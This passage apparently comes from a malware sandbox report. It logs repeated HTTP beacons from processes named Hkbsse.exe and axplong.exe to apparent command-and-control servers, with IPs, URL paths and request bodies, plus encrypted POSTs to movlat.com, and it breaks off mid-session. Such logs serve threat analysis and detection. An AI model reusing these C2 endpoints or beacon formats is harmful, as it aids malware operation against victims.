129	192.168.2.7	49893	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:05.622263908 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:06.255914927 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:06.310324907 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:06.502065897 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.7	49894	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:05.873734951 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:06.562558889 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.7	49895	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:06.747745991 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:07.362770081 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:07.429150105 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:07.624361038 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.7	49896	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:06.787857056 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 06:00:07.451956987 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.7	49897	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:07.720612049 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:08.355638981 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:08.382714033 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 06:00:08.596887112 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.7	49898	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:07.912631989 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:08.508640051 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:08.545559883 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:08.736985922 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.7	49899	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:08.899415970 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:09.557236910 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:09.586500883 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 06:00:09.823051929 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
136	192.168.2.7	49900	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:09.055074930 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:09.647687912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:09.680309057 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:09.879035950 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
137	192.168.2.7	49901	78.89.199.216	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:09.685245991 CEST	275	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cpfngtjgcorwakca.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 213 Host: movlat.com
Jun 27, 2024 06:00:09.685269117 CEST	213	OUT	Data Raw: 3b 6e 58 65 8c c9 61 56 da a2 c3 73 77 01 7e bb 7a 0e cd e7 62 76 e3 67 0e 08 0e e5 40 c2 c3 1a ed 5c c2 20 02 6a 24 6c ec 97 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 46 52 cd b8 Data Ascii: ;nXeaVsw~zbvg@\ j$l?=8kI?pLM@NA -[k,vuFRNB\z} d0-hBY!9`75zZXJ7dCq6rC5<=-HeBGxX/[Ep
Jun 27, 2024 06:00:10.814656973 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 27 Jun 2024 04:00:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
138	192.168.2.7	49902	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:10.157937050 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:10.735440969 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:10.808558941 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7DCA220724CA8DC12157DEBD66259586F0F21EA74869AC58983B5F40C2F917A0DCEAF4A09E31C8130203025681CC1DCD416766C5AA44258F2285CC30
Jun 27, 2024 06:00:11.001007080 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
139	192.168.2.7	49903	77.91.77.81	80	8080	C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:10.197240114 CEST	152	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:10.849627972 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:10.928967953 CEST	312	OUT	POST /Kiru9gu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.81 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Jun 27, 2024 06:00:11.146526098 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
140	192.168.2.7	49904	78.89.199.216	80

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:11.044219017 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://yqweilcuabc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 227 Host: movlat.com
Jun 27, 2024 06:00:11.044228077 CEST	227	OUT	Data Raw: 3b 6e 58 65 8c c9 61 56 da a2 c3 73 77 01 7e bb 7a 0e cd e7 62 76 e3 67 0e 08 0e e5 40 c2 c3 1a ed 5c c2 20 02 6a 24 6c ec 97 3f c5 3d 38 df f7 6b bf 49 3f c2 70 4c f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 73 4a e2 96 Data Ascii: ;nXeaVsw~zbvg@\ j$l?=8kI?pLM@NA -[k,vusJ;z\|i[$4:WD>S6<_1<<QUV>Bgse^_RJ6D5]b8=k/xwsC
Jun 27, 2024 06:00:12.140127897 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Thu, 27 Jun 2024 04:00:11 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
141	192.168.2.7	49906	185.172.128.116	80	5404	C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Jun 27, 2024 06:00:11.275486946 CEST	157	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jun 27, 2024 06:00:11.895292997 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 27 Jun 2024 04:00:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jun 27, 2024 06:00:11.960994005 CEST	317	OUT	POST /Mb3GvQs8/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.172.128.116 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 44 43 41 32 32 30 37 32 34 43 41 38 44 43 31 32 31 35 37 44 45 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 46 34 30 43 32 46 39 31 37 41 30 44 43 45 41 46 34 41 30 39 45 33 31 43 38 31 33 30 32 30 33 30 32 35 36 38 31 43 43 31 44 43 44 34 31 36 37 36 36 43 35 41 41 34 34 32 35 38 46 32 32 38 35 43 43 33 30 Data Ascii: 